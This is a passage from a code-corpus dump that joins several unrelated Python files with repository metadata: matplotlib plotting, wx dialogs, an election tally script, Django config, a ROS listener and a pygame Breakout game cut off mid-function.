        return ax.plot_surface(X, Y, Z, label=label, **kwargs)

    def fill_between(self, ax, X, lower, upper, color=Tango.colorsHex['mediumBlue'], label=None, **kwargs):
        """Shade the region between two curves."""
        return ax.fill_between(X, lower, upper, facecolor=color, label=label, **kwargs)

    def fill_gradient(self, canvas, X, percentiles, color=Tango.colorsHex['mediumBlue'], label=None, **kwargs):
        """Shade nested percentile bands with alpha fading towards the extremes.

        Builds one polygon per adjacent percentile pair and adds them as a
        single PolyCollection, so inner bands appear more opaque.
        """
        ax = canvas
        plots = []
        if 'edgecolors' not in kwargs:
            kwargs['edgecolors'] = 'none'
        if 'facecolors' in kwargs:
            color = kwargs.pop('facecolors')
        if 'array' in kwargs:
            array = kwargs.pop('array')
        else:
            # Alpha weights: 1 at the median band, fading towards the outer bands.
            array = 1.-np.abs(np.linspace(-.97, .97, len(percentiles)-1))
        if 'alpha' in kwargs:
            alpha = kwargs.pop('alpha')
        else:
            alpha = .8
        if 'cmap' in kwargs:
            cmap = kwargs.pop('cmap')
        else:
            cmap = LinearSegmentedColormap.from_list('WhToColor', (color, color), N=array.size)
        cmap._init()
        cmap._lut[:-3, -1] = alpha*array
        kwargs['facecolors'] = [cmap(i) for i in np.linspace(0,1,cmap.N)]
        # pop where from kwargs
        where = kwargs.pop('where') if 'where' in kwargs else None
        # pop interpolate, which we actually do not do here!
        if 'interpolate' in kwargs: kwargs.pop('interpolate')
        def pairwise(iterable):
            "s -> (s0,s1), (s1,s2), (s2, s3), ..."
            from itertools import tee
            a, b = tee(iterable)
            next(b, None)
            return zip(a, b)
        polycol = []
        for y1, y2 in pairwise(percentiles):
            # NOTE(review): mlab.contiguous_regions was removed in matplotlib
            # 3.1 -- this path needs porting for modern matplotlib.
            import matplotlib.mlab as mlab
            # Handle united data, such as dates
            ax._process_unit_info(xdata=X, ydata=y1)
            ax._process_unit_info(ydata=y2)
            # Convert the arrays so we can work with them
            from numpy import ma
            x = ma.masked_invalid(ax.convert_xunits(X))
            y1 = ma.masked_invalid(ax.convert_yunits(y1))
            y2 = ma.masked_invalid(ax.convert_yunits(y2))
            if y1.ndim == 0:
                y1 = np.ones_like(x) * y1
            if y2.ndim == 0:
                y2 = np.ones_like(x) * y2
            if where is None:
                where = np.ones(len(x), bool)
            else:
                where = np.asarray(where, bool)
            if not (x.shape == y1.shape == y2.shape == where.shape):
                raise ValueError("Argument dimensions are incompatible")
            from functools import reduce
            mask = reduce(ma.mask_or, [ma.getmask(a) for a in (x, y1, y2)])
            if mask is not ma.nomask:
                where &= ~mask
            polys = []
            for ind0, ind1 in mlab.contiguous_regions(where):
                xslice = x[ind0:ind1]
                y1slice = y1[ind0:ind1]
                y2slice = y2[ind0:ind1]
                if not len(xslice):
                    continue
                N = len(xslice)
                p = np.zeros((2 * N + 2, 2), float)
                # the purpose of the next two lines is for when y2 is a
                # scalar like 0 and we want the fill to go all the way
                # down to 0 even if none of the y1 sample points do
                start = xslice[0], y2slice[0]
                end = xslice[-1], y2slice[-1]
                p[0] = start
                p[N + 1] = end
                p[1:N + 1, 0] = xslice
                p[1:N + 1, 1] = y1slice
                p[N + 2:, 0] = xslice[::-1]
                p[N + 2:, 1] = y2slice[::-1]
                polys.append(p)
            polycol.extend(polys)
        from matplotlib.collections import PolyCollection
        if 'zorder' not in kwargs:
            kwargs['zorder'] = 0
        plots.append(PolyCollection(polycol, **kwargs))
        ax.add_collection(plots[-1], autolim=True)
        ax.autoscale_view()
        return plots
| [
"mamegomaday@gmail.com"
] | mamegomaday@gmail.com |
7c31b34e4f744edea1e56b89ce641687443b1802 | 9463df28c60275a872c8ea891e731e5e6b14ac32 | /Mopy/mash/gui/dialog.py | ec918d9eb5678c19e5adf58d202329446d6ce5b0 | [] | no_license | Danjb1/Wrye-Mash | 091fc60aabd1d564fc6686e389cd992d001b550b | 9a93fe47e98cfc8e93769f6b45341f4e78c568fa | refs/heads/master | 2021-08-17T05:26:42.055368 | 2017-11-20T20:11:12 | 2017-11-20T20:12:42 | 111,451,108 | 0 | 0 | null | 2017-11-20T19:04:22 | 2017-11-20T19:04:22 | null | UTF-8 | Python | false | false | 4,958 | py | import wx
from .. import conf
from .. import globals
#import gui
from ..mosh import _
from .. import mosh
class ProgressDialog(mosh.Progress):
    """Displays progress in a modal wx.ProgressDialog.

    (The previous docstring -- "Prints progress to file" -- described a
    different Progress subclass; this one drives a GUI dialog.)
    """
    def __init__(self,title=_('Progress'),message='',parent=None,
        style=wx.PD_APP_MODAL|wx.PD_ELAPSED_TIME,interval=0.1):
        self.dialog = wx.ProgressDialog(title,message,100,parent,style)
        mosh.Progress.__init__(self,interval)
        self.isDestroyed = False
    def doProgress(self,progress,message):
        # progress is a 0..1 fraction; wx.ProgressDialog expects 0..100.
        if self.dialog:
            self.dialog.Update(int(progress*100),message)
        else:
            # NOTE(review): ``gui`` is never imported (the import above is
            # commented out), so this raise would itself fail with NameError.
            raise gui.InterfaceError,_('Dialog already destroyed.')
    def Destroy(self):
        # Destroy the wx dialog once and drop the reference so later calls no-op.
        if self.dialog:
            self.dialog.Destroy()
            self.dialog = None
def TextEntry(parent,message,default=''):
    """Shows a text entry dialog and returns result or None if canceled."""
    dialog = wx.TextEntryDialog(parent,message,default)
    if dialog.ShowModal() != wx.ID_OK:
        # Canceled/closed: clean up the dialog and signal no value.
        dialog.Destroy()
        return None
    else:
        value = dialog.GetValue()
        dialog.Destroy()
        return value
def DirDialog(parent,message=_('Choose a directory.'),defaultPath=''):
    """Shows a modal directory dialog and return the resulting path, or None if canceled."""
    dialog = wx.DirDialog(parent,message,defaultPath,style=wx.DD_NEW_DIR_BUTTON)
    if dialog.ShowModal() != wx.ID_OK:
        # Canceled/closed: clean up the dialog and signal no selection.
        dialog.Destroy()
        return None
    else:
        path = dialog.GetPath()
        dialog.Destroy()
        return path
def ContinueQuery(parent,message,continueKey,title=_('Warning')):
    """Shows a modal continue query if value of continueKey is false. Returns True to continue.
    Also provides checkbox "Don't show this in future." to set continueKey to true."""
    #--ContinueKey set?
    # User previously opted out of this warning: behave as if OK was pressed.
    if conf.settings.get(continueKey): return wx.ID_OK
    #--Generate/show dialog
    dialog = wx.Dialog(parent,-1,title,size=(350,200),style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
    sizer = wx.BoxSizer(wx.VERTICAL)
    staticText = wx.StaticText(dialog,-1,message,style=wx.ST_NO_AUTORESIZE)
    sizer.Add(staticText,1,wx.EXPAND|wx.ALL,6)
    checkBox = wx.CheckBox(dialog,-1,_("Don't show this in the future."))
    sizer.Add(checkBox,0,wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM,6)
    #--Save/Cancel
    sizer_h1 = wx.BoxSizer(wx.HORIZONTAL)
    sizer_h1.Add((0,0),1)
    sizer_h1.Add(wx.Button(dialog,wx.ID_OK))
    sizer_h1.Add(wx.Button(dialog,wx.ID_CANCEL),0,wx.LEFT,4)
    sizer.Add(sizer_h1,0,wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM,6)
    dialog.SetSizer(sizer)
    #--Get continue key setting and return
    # Persist the opt-out if the user checked the box, regardless of OK/Cancel.
    result = dialog.ShowModal()
    if checkBox.GetValue():
        conf.settings[continueKey] = 1
    return result
def LogMessage(parent,message,logText,title='',style=0,asDialog=True):
    """Show logText in a read-only multiline text window.

    With asDialog=True a modal dialog is used and its position/size are
    saved back to conf.settings on close; otherwise a non-modal frame is
    shown (position/size restored from conf.settings but not saved).
    """
    #--Query Dialog
    pos = conf.settings.get('mash.message.log.pos',wx.DefaultPosition)
    size = conf.settings.get('mash.message.log.size',(400,400))
    if asDialog:
        window = wx.Dialog(parent,-1,title,pos=pos,size=size,
            style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
    else:
        window = wx.Frame(parent,-1,title,pos=pos,size=(200,300),
            style= (wx.RESIZE_BORDER | wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX | wx.CLIP_CHILDREN))
        window.SetIcons(globals.images['mash.icons2'].GetIconBundle())
    window.SetSizeHints(200,200)
    sizer = wx.BoxSizer(wx.VERTICAL)
    if message:
        sizer.Add(wx.StaticText(window,-1,message),0,wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP,6)
    textCtrl = wx.TextCtrl(window,-1,logText,style=wx.TE_READONLY|wx.TE_MULTILINE)
    sizer.Add(textCtrl,1,wx.EXPAND)#|wx.ALL,6)
    window.SetSizer(sizer)
    if asDialog:
        window.ShowModal()
        #--Done
        conf.settings['mash.message.log.pos'] = window.GetPosition()
        conf.settings['mash.message.log.size'] = window.GetSizeTuple()
        window.Destroy()
    else:
        window.Show()
def InfoMessage(parent,message,title=_('Information'),style=(wx.OK|wx.ICON_INFORMATION)):
    """Shows a modal information message. Returns the dialog result."""
    return Message(parent,message,title,style)
def WarningQuery(parent,message,title='',style=(wx.YES_NO|wx.ICON_EXCLAMATION)):
    """Shows a modal yes/no warning query. Returns the dialog result."""
    return Message(parent,message,title,style)
def WarningMessage(parent,message,title=_('Warning'),style=(wx.OK|wx.ICON_EXCLAMATION)):
    """Shows a modal warning message. Returns the dialog result."""
    return Message(parent,message,title,style)
def ErrorMessage(parent,message,title=_('Error'),style=(wx.OK|wx.ICON_HAND)):
    """Shows a modal error message. Returns the dialog result."""
    return Message(parent,message,title,style)
def Message(parent,message,title='',style=wx.OK):
    """Shows a modal MessageDialog.
    Use ErrorMessage, WarningMessage or InfoMessage."""
    dialog = wx.MessageDialog(parent,message,title,style)
    try:
        return dialog.ShowModal()
    finally:
        # The dialog is torn down whether or not ShowModal raised.
        dialog.Destroy()
| [
"jacob@jacobessex.com"
] | jacob@jacobessex.com |
114c21b76e999987673ccb2fcfe41a294eb6c4cd | faf4934280c53ce10e91019bfcb30054f5db0b22 | /PyPoll_Challenge.py | 49b9bd2c92bcec09ecf7c1aebc6cc884eb5e9058 | [] | no_license | zoomdmartin02/Election-Analysis | a8c859cec7aba572147d67cd7dd2c5bfd1cce77a | a95968ae53e5fd98585df1f8f1384b8628e99183 | refs/heads/main | 2022-12-30T21:53:24.078902 | 2020-10-18T03:20:38 | 2020-10-18T03:20:38 | 303,420,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,336 | py | # -*- coding: UTF-8 -*-
"""PyPoll Homework Challenge Solution."""
# Add our dependencies.
import csv
import os
# Add a variable to load a file from a path.
file_to_load = os.path.join("Resources", "election_results.csv")
# Add a variable to save the file to a path.
file_to_save = os.path.join("analysis", "election_analysis.txt")
# Initialize a total vote counter.
total_votes = 0
# Candidate Options and candidate votes.
candidate_options = []
candidate_votes = {}
# 1: Create a county list and county votes dictionary.
county_list = []
county_votes = {}
# Track the winning candidate, vote count and percentage
winning_candidate = ""
winning_count = 0
winning_percentage = 0
# 2: Track the largest county and county voter turnout.
lturnout_county = ""
lturnout_county_vote_count = 0
lturnout_percentage = 0
# Read the csv and tally votes per candidate and per county
# (rows are streamed; expected columns: [ballot id, county, candidate]).
with open(file_to_load) as election_data:
    reader = csv.reader(election_data)
    # Read the header
    header = next(reader)
    # For each row in the CSV file.
    for row in reader:
        # Add to the total vote count
        total_votes = total_votes + 1
        # Get the candidate name from each row.
        candidate_name = row[2]
        # 3: Extract the county name from each row.
        county_name = row[1]
        # If the candidate does not match any existing candidate add it to
        # the candidate list
        if candidate_name not in candidate_options:
            # Add the candidate name to the candidate list.
            candidate_options.append(candidate_name)
            # And begin tracking that candidate's voter count.
            candidate_votes[candidate_name] = 0
        # Add a vote to that candidate's count
        candidate_votes[candidate_name] += 1
        # 4a: Write a decision statement that checks that the
        # county does not match any existing county in the county list.
        if county_name not in county_list:
            # 4b: Add the existing county to the list of counties.
            county_list.append(county_name)
            # 4c: Begin tracking the county's vote count.
            county_votes[county_name] = 0
        # 5: Add a vote to that county's vote count.
        county_votes[county_name] += 1
# Save the results to our text file (and echo each section to the terminal).
with open(file_to_save, "w") as txt_file:
    # Print the final vote count (to terminal)
    election_results = (
        f"\nElection Results:\n\n"
        f"-------------------------\n"
        f"Total Votes: {total_votes:,}\n"
        f"-------------------------\n\n")
        #f"County Votes:\n")
    print(election_results, end="")
    txt_file.write(election_results)
    # 6a: Write a repetition statement to get the county from the county dictionary.
    for county_name in county_votes:
        # 6b: Retrieve the county vote count.
        cvotes = county_votes.get(county_name)
        # 6c: Calculate the percent of total votes for the county.
        cvote_percentage = float(cvotes) / float(total_votes) * 100
        # 6d: Print the county results to the terminal.
        county_results = (
            f"{county_name}: {cvote_percentage:.1f}% ({cvotes:,})\n\n")
        print(county_results)
        # 6e: Save the county votes to a text file.
        txt_file.write(county_results)
        # 6f: Write a decision statement to determine the winning county and get its vote count.
        if (cvotes > lturnout_county_vote_count) and (cvote_percentage > lturnout_percentage):
            lturnout_county_vote_count = cvotes
            lturnout_county = county_name
            lturnout_percentage = cvote_percentage
    # 7: Print the county with the largest turnout to the terminal.
    lc_turnout = (
        f"-------------------------\n"
        f"Largest County Turnout: {lturnout_county}\n"
        f"-------------------------\n\n")
    print(lc_turnout)
    # 8: Save the county with the largest turnout to a text file.
    txt_file.write(lc_turnout)
    # Save the final candidate vote count to the text file.
    for candidate_name in candidate_votes:
        # Retrieve vote count and percentage
        votes = candidate_votes.get(candidate_name)
        vote_percentage = float(votes) / float(total_votes) * 100
        candidate_results = (
            f"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\n\n")
        # Print each candidate's voter count and percentage to the
        # terminal.
        print(candidate_results)
        # Save the candidate results to our text file.
        txt_file.write(candidate_results)
        # Determine winning vote count, winning percentage, and candidate.
        if (votes > winning_count) and (vote_percentage > winning_percentage):
            winning_count = votes
            winning_candidate = candidate_name
            winning_percentage = vote_percentage
    # Print the winning candidate (to terminal)
    winning_candidate_summary = (
        f"-------------------------\n"
        f"Winner: {winning_candidate}\n"
        f"Winning Vote Count: {winning_count:,}\n"
        f"Winning Percentage: {winning_percentage:.1f}%\n"
        f"-------------------------\n\n")
    print(winning_candidate_summary)
    # Save the winning candidate's name to the text file
    txt_file.write(winning_candidate_summary)
| [
"72090048+zoomdmartin02@users.noreply.github.com"
] | 72090048+zoomdmartin02@users.noreply.github.com |
527e1d3f88a693ec87caa4854d2832e4ace358cb | 496a450bc20436fdb676528a8213a754b895e306 | /moniter/urls.py | 87625c61f7100a41d201ce191cea84ae49385af0 | [] | no_license | mengguiyouziyi/Monitoring | 805dacf1ae3b6684e4930b3f0482139b8188bae5 | e2b145fbaceaf362edfe414d9690811829af5e27 | refs/heads/master | 2020-06-28T22:34:21.811173 | 2019-08-03T10:14:49 | 2019-08-03T10:14:49 | 200,201,005 | 0 | 0 | null | 2019-08-02T08:52:49 | 2019-08-02T08:52:49 | null | UTF-8 | Python | false | false | 749 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^welcome', views.welcome),
url(r'^first_welcome', views.welcome_first, name='first_welcome'),
url(r'^order', views.order),
url(r'^cate', views.cate),
url(r'^member', views.member, name='member'),
url(r'^del_data/(?P<spider_id>[0-9]+)$', views.del_data, name='del_data'),
url(r'^status_edit/(.*?)$', views.edit_status, name='status_edit'),
url(r'^edit/(?P<spider_id>[0-9]+)$', views.edit, name='edit'),
url(r'^edit_action/', views.edit_action, name='edit_action'),
url(r'^active_member', views.member_first, name='active_member'),
url(r'^json_data', views.json_data, name='json_data'),
] | [
"ysh17600824539@163.com"
] | ysh17600824539@163.com |
acf05d3118136eda97208eb88dd7e8c8055cb3e6 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /Hs7YDjZALCEPRPD6Z_23.py | df3fe0713ed74b8a036c99152bfd2695f2129cfd | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py |
def count_uppercase(a):
    """Count the uppercase elements across a nested iterable.

    `a` is an iterable of iterables (e.g. a list of strings); returns the
    number of inner elements for which str.isupper() is true. Rewritten
    from a lambda assignment (PEP 8 E731) and the redundant inner list
    dropped in favour of a generator expression.
    """
    return sum(y.isupper() for x in a for y in x)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
e727df6f8b5c810fffeda45044c20e447e6ddb8e | 29cd1124f9c5d18009a1e5a6b34a348f910679f6 | /June/June 28th/RNA_Synthesis.py | 354b5c23e4796d6d689abdbe7746b597a21189fd | [] | no_license | RobertMcCutchen/DigitalCrafts_Assignments | 39336d8baeee88ad67e8498da485c99bb313012d | 0d9553f403205d4409d48923a2d1515ab267e144 | refs/heads/master | 2022-12-11T22:22:35.352967 | 2020-02-24T01:39:47 | 2020-02-24T01:39:47 | 193,777,230 | 0 | 1 | null | 2022-12-11T01:53:27 | 2019-06-25T20:17:19 | JavaScript | UTF-8 | Python | false | false | 412 | py | import DNA_Synthesis
def generate_RNA():
    """Transcribe the DNA strand from DNA_Synthesis into its RNA complement.

    Bases map A->U, T->A, C->G, G->C; any other symbol in the DNA
    sequence is skipped, matching the original branch-per-base logic.
    Returns the RNA sequence as a list of single-character strings.
    """
    complement = {'A': 'U', 'T': 'A', 'C': 'G', 'G': 'C'}
    dna = DNA_Synthesis.generate_DNA()
    return [complement[base] for base in dna if base in complement]

generate_RNA()
"robertmccutchen@Roberts-MacBook-Air.local"
] | robertmccutchen@Roberts-MacBook-Air.local |
3daa23e04e753171636b9449afe14643a87bb625 | 8fb7e1cb6e9977d88ba3927fabe4e82b4776f50b | /PhoneBook/wsgi.py | 23231d462acc595e9abc996543488c30668418ed | [] | no_license | krishkool/Phone-Book-Manager | 792be9596bbfbe5d98f3238ea5f61f51990cee93 | e796abfba7255939c27398b3478fa89b8e7a59ae | refs/heads/master | 2023-08-11T20:31:50.741188 | 2021-09-22T10:56:37 | 2021-09-22T10:56:37 | 409,166,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for PhoneBook project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings before building the application.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'PhoneBook.settings')
# Module-level WSGI callable imported by WSGI servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"arKrish.sai@gmail.com"
] | arKrish.sai@gmail.com |
e6fd23c8b678f9307032b817846c006d4af457f3 | c4802d81423fbbbe4b5e05ebd9ddeee9ef24321c | /src/receiver_test.py | db0b3214ff5b24e307c0f161427870740097f74f | [] | no_license | zukowski/xhab | bc2f472a1cc6c66fac36c80b747810d98af37870 | 6aab291ebc060cf33e84b8514af1146ed20b5c79 | refs/heads/master | 2016-09-05T18:56:49.517516 | 2013-08-21T04:08:58 | 2013-08-21T04:08:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | #!/usr/bin/env python
#omkar test code
import math
import time
import rospy #loads ros libraries
from std_msgs.msg import String #used for sending mes data in ros
from lib_robotis import * #loads robitis libraries for servos
from xhab.msg import TrajectoryJointAngles
'''
#Set up global variables for servos
USB0 = USB2Dynamixel_Device('/dev/ttyUSB0')
USB1 = USB2Dynamixel_Device('/dev/ttyUSB1')
shoulder1 = Robotis_Servo( USB0, 7 )
shoulder2 = Robotis_Servo( USB0, 2 )
elbow1 = Robotis_Servo( USB1, 3 )
elbow2 = Robotis_Servo( USB1, 4 )
wrist = Robotis_Servo( USB1, 5 )
ee = Robotis_Servo( USB1, 6 )
'''
def callback(data):
    """ROS subscriber callback: log each received joint-angle message.

    The triple-quoted block below is the original (disabled) servo-driving
    code that mapped the message's joint angles onto the Robotis servos.
    """
    '''
    #Move each of the arm joints to recieved angle
    shoulder1.move_angle( math.radians( float( data.shoulder1_angle ) ) , blocking = False )
    shoulder2.move_angle( math.radians( float( data.shoulder2_angle ) ) , blocking = True )
    elbow1.move_angle( math.radians( float( data.elbow1_angle ) ) , blocking = True )
    elbow2.move_angle( math.radians(float( data.elbow2_angle ) ) , blocking = True )
    wrist.move_angle( wrist.read_angle() + math.radians( float( data.wrist_angle ) ) , blocking = True )
    '''
    rospy.loginfo(data)
def listener():
    """Initialise the ROS node and spin, dispatching joint-state messages to callback."""
    rospy.init_node('control_receive_arm_angles', anonymous=True)
    # JointState is defined in sensor_msgs; it was referenced below without
    # ever being imported, so the subscription raised NameError at startup.
    from sensor_msgs.msg import JointState
    #rospy.Subscriber('/control/arm/joint_angles', TrajectoryJointAngles, callback)
    rospy.Subscriber('/joint_states', JointState, callback)
    rospy.spin()
if __name__ == '__main__':
    # Run the subscriber node directly; blocks until ROS shutdown.
    listener()
| [
"scottmishra@gmail.com"
] | scottmishra@gmail.com |
6c9106284d364625ac423ab62e764d339dc88baa | be98cf80de58239f5b2329e485d27848cd2cb1e5 | /src/pybreakout/pybreakout.py | f929db1698fb5e3c825455c031e2576bde47875c | [] | no_license | jsmith12345/pybreakout | 5adf8908413b3ff13f05d38d0ad97539197e3e0d | e97d32907858225c54fb47140e1ca77ee351d6fa | refs/heads/master | 2016-08-10T14:32:25.016919 | 2006-10-20T04:35:45 | 2006-10-20T04:35:45 | 55,521,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,580 | py | import pygame, math, time, soundmanager
from pygame.locals import *
from utilities.common import Describer
from os.path import join
from sys import exit
from random import randrange,randint
# Colours (RGB tuples) used when rendering text.
RGB_BLACK = 0,0,0
RGB_WHITE = 255,255,255
RGB_RED = 255,0,0
# Gameboard (play-field) dimensions in pixels.
GB_WIDTH = 280
GB_HEIGHT = 380
# Default paddle placement near the bottom centre of the board.
PADDLE_START_TOP = GB_HEIGHT - 30
PADDLE_START_LEFT = GB_WIDTH / 2
# Baseline frame delay: the main loop waits (STARTSPEED - speed) ms per frame,
# so higher game speed means a shorter wait.
STARTSPEED = 5
# Playable level indices; level layouts live in resources/levels/level<N>.dat.
FIRST_LEVEL = 0
LAST_LEVEL = 5
class Ball(Describer):
    """The ball for the PyBreakout game.

    A ball tracks its sprite/rect, a unit direction (x_dir, y_dir), a
    speed, and whether it is still stuck to the paddle awaiting launch.
    """
    def __init__(self, imageFilename):
        "Ball __init__ method creates a ball in its default position with its default states"
        self.image = pygame.image.load(imageFilename)
        self.rect = self.image.get_rect()
        # angle/speed are retained as state for compatibility; movement is
        # driven purely by x_dir/y_dir in autoMove().
        self.angle = 135
        self.speed = 1
        self.x_dir = 1
        self.y_dir = -1
        # A freshly created ball rides on the paddle until launched (Spacebar).
        self.stuck = True
        self.resetState()
    def resetState(self):
        "Ball is reset to sit motionless on top of paddle, launch with Spacebar"
        # NOTE: moves relative to the current rect, so this is only valid on
        # a freshly created ball whose rect still sits at the origin.
        self.rect = self.rect.move(PADDLE_START_LEFT+30, PADDLE_START_TOP-self.rect.height)
    def moveDown(self, pixelsDown):
        "Move the ball image down pixelsDown worth"
        self.rect = self.rect.move(0,pixelsDown)
    def moveUp(self, pixelsUp):
        "Move the ball image up pixelsUp worth"
        self.rect = self.rect.move(0,-pixelsUp)
    def moveLeft(self, pixelsLeft):
        "Move the ball image left pixelsLeft worth"
        self.rect = self.rect.move(-pixelsLeft, 0)
    def moveRight(self, pixelsRight):
        "Move the ball image right pixelsRight worth"
        self.rect = self.rect.move(pixelsRight, 0)
    def autoMove(self):
        """Advance one pixel step along (x_dir, y_dir), bouncing off walls.

        Returns True when the ball rebounded off the left, right or top
        edge of the board (the caller plays a sound in that case); a stuck
        ball never moves. The dead x_part/y_part trigonometry that the
        original computed and never used has been removed.
        """
        if self.stuck:
            return False
        hitWall = False
        # Reverse direction at the playfield edges.
        if self.rect.left == 0:
            self.x_dir = 1
            hitWall = True
        if self.rect.right == GB_WIDTH:
            self.x_dir = -1
            hitWall = True
        if self.rect.top == 0:
            self.y_dir = 1
            hitWall = True
        self.rect = self.rect.move(self.x_dir, self.y_dir)
        return hitWall
class Bonus(Describer):
    """Base class for falling bonus pickups in PyBreakout.

    A bonus is a sprite that drifts straight down toward the paddle once
    the brick holding it has been destroyed.
    """
    def __init__(self, imageFilename):
        """Load the bonus sprite and initialise its downward drift."""
        self.image = pygame.image.load(imageFilename)
        self.rect = self.image.get_rect()
        self.speed = 1
        # Straight-down motion: no horizontal component.
        self.x_dir = 0
        self.y_dir = 1
    def moveDown(self, pixelsDown):
        """Shift the bonus sprite pixelsDown pixels toward the bottom edge."""
        self.rect.move_ip(0, pixelsDown)
class Triball(Bonus):
    """Falling bonus that spawns two extra balls when caught by the paddle."""
    def __init__(self, myBrick):
        Bonus.__init__(self,join("resources","images","triball-bonus.png"))
        # Drop from the position of the brick that held this bonus.
        self.rect.move_ip(myBrick.position)
    def applyBonus(self, pybreakout):
        """Add two additional balls just above/below balls[0], moving the same way."""
        #print "this is where I add two additional balls"
        ball1 = Ball(join("resources","images","ball-mini.png"))
        ball2 = Ball(join("resources","images","ball-mini.png"))
        self.adjustBall(ball1,5,pybreakout)
        self.adjustBall(ball2,-5,pybreakout)
        pybreakout.balls.append(ball1)
        pybreakout.balls.append(ball2)
        #print "Adding two, len(self.balls) = " + str(len(pybreakout.balls))
    def adjustBall(self,currentBall,numPixels,pybreakout):
        """Place currentBall at balls[0] offset vertically by numPixels, already launched.

        The rect is zeroed first because move_ip is relative; the new ball
        copies the lead ball's direction so all three travel together.
        """
        currentBall.rect.top = 0
        currentBall.rect.left = 0
        #print "pybreakout.balls[1].rect = " + str(pybreakout.balls[1].rect)
        currentBall.rect.move_ip(pybreakout.balls[0].rect.x,pybreakout.balls[0].rect.y+numPixels)
        #print "pybreakout.balls[1].rect after moving to balls[0] = " + str(pybreakout.balls[1].rect)
        currentBall.stuck = False
        currentBall.x_dir = pybreakout.balls[0].x_dir
        currentBall.y_dir = pybreakout.balls[0].y_dir
class Slowball(Bonus):
    """Falling bonus that drops the game speed back to its slowest setting."""
    def __init__(self, myBrick):
        """Create the slowball pickup at the position of the brick that held it."""
        Bonus.__init__(self, join("resources", "images", "slowball-bonus.png"))
        self.rect.move_ip(myBrick.position)
    def applyBonus(self, pybreakout):
        """Reset the game speed; speed 0 yields the longest per-frame delay."""
        pybreakout.speed = 0
class Paddle(Describer):
    """The player-controlled paddle; drags a still-stuck ball along as it moves."""
    def __init__(self, imageFilename, ball):
        """Load the paddle sprite, remember its ball, and park it at the start spot."""
        self.image = pygame.image.load(imageFilename)
        self.rect = self.image.get_rect()
        self.ball = ball
        self.resetState()
    def resetState(self):
        """Park the paddle at its starting position (bottom centre of the board)."""
        self.rect.move_ip(PADDLE_START_LEFT, PADDLE_START_TOP)
    def moveLeft(self, pixelsLeft):
        """Slide the paddle left, carrying a stuck ball with it."""
        self.rect.move_ip(-pixelsLeft, 0)
        if self.ball.stuck:
            self.ball.rect.move_ip(-pixelsLeft, 0)
    def moveRight(self, pixelsRight):
        """Slide the paddle right, carrying a stuck ball with it."""
        self.rect.move_ip(pixelsRight, 0)
        if self.ball.stuck:
            self.ball.rect.move_ip(pixelsRight, 0)
class Brick(Describer):
    """every brick has the following
    an image: filename
    point value: int
    isDestructible: True/False
    isDestroyed: True/False
    a rectangular position: (x,y)"""
    def __init__(self, imageFilename, position, value=10, destructible=True, destroyed=False):
        self.image = pygame.image.load(imageFilename)
        self.rect = self.image.get_rect()
        self.position = position
        self.rect.move_ip(position)
        self.pointValue = value
        self.isDestructible = destructible
        self.isDestroyed = destroyed
        # Set via addBonus(); released by the game when the brick is destroyed.
        self.hasBonus = False
        # Counts hits on indestructible (grey) bricks; the game logic
        # destroys them after enough hits.
        self.hitCount = 0
    def addBonus(self, bonusType):
        """Attach a Bonus instance to drop when this brick is destroyed."""
        self.hasBonus = True
        self.bonus = bonusType
class PyBreakout(Describer):
    "This is the main game class for PyBreakout"
    def __init__(self):
        """Set up game state, the sound manager, a fresh game, and the display."""
        self.running = False
        self.size = GB_WIDTH, GB_HEIGHT
        self.height = self.size[1]
        self.width = self.size[0]
        self.soundManager = soundmanager.SoundManager()
        self.startGame()
        self.initializeScreen()
    def initializeScreen(self):
        """Create the display surface and draw the initial frame."""
        #Create Gameboard with RGB_BLACK background
        self.screen = pygame.display.set_mode(self.size)
        self.updateScreen()
    def loadBricks(self):
        """Read the current level's .dat layout and build its Brick objects.

        Each line of the file is a comma-separated row of brick characters
        (see createBrick); rows are laid out 10 pixels apart starting at
        y=120. Also clears any falling bonuses from the previous level.
        """
        self.bonuses = []
        allBricks = []
        levelFile = open(join('resources','levels','level'+str(self.level)+".dat"))
        levelData = levelFile.readlines()
        self.drawLocation = [0,120]
        for levelLine in levelData:
            lineBricks = levelLine.strip().split(',')
            for brickChar in lineBricks:
                allBricks.append(self.createBrick(brickChar))
            self.drawLocation = 0,self.drawLocation[1]+10
        return allBricks
    def drawBricks(self):
        '''given all the Brick objects:
        1) Check to see if they are Destroyed
        2) if not Destroyed, draw currentBrick.image at currentBrick.position'''
        for currentBrick in self.bricks:
            if not currentBrick.isDestroyed:
                self.screen.blit(currentBrick.image, currentBrick.position)
    def createBrick(self, brickChar):
        "Given a brickChar, create the appropriate instance object of the Brick class and return it"
        # R/P/G/O/B are coloured destructible bricks with a random chance of
        # carrying a bonus; Q is indestructible grey; '.' is an empty slot
        # (a pre-destroyed brick). Bricks are laid out 40 pixels apart.
        if brickChar == 'R':
            newBrick = Brick(join("resources","images","brick-red.png"), self.drawLocation)
            luckyNum = randint(0,4)
            #luckyNum = 3
            if luckyNum == 3:
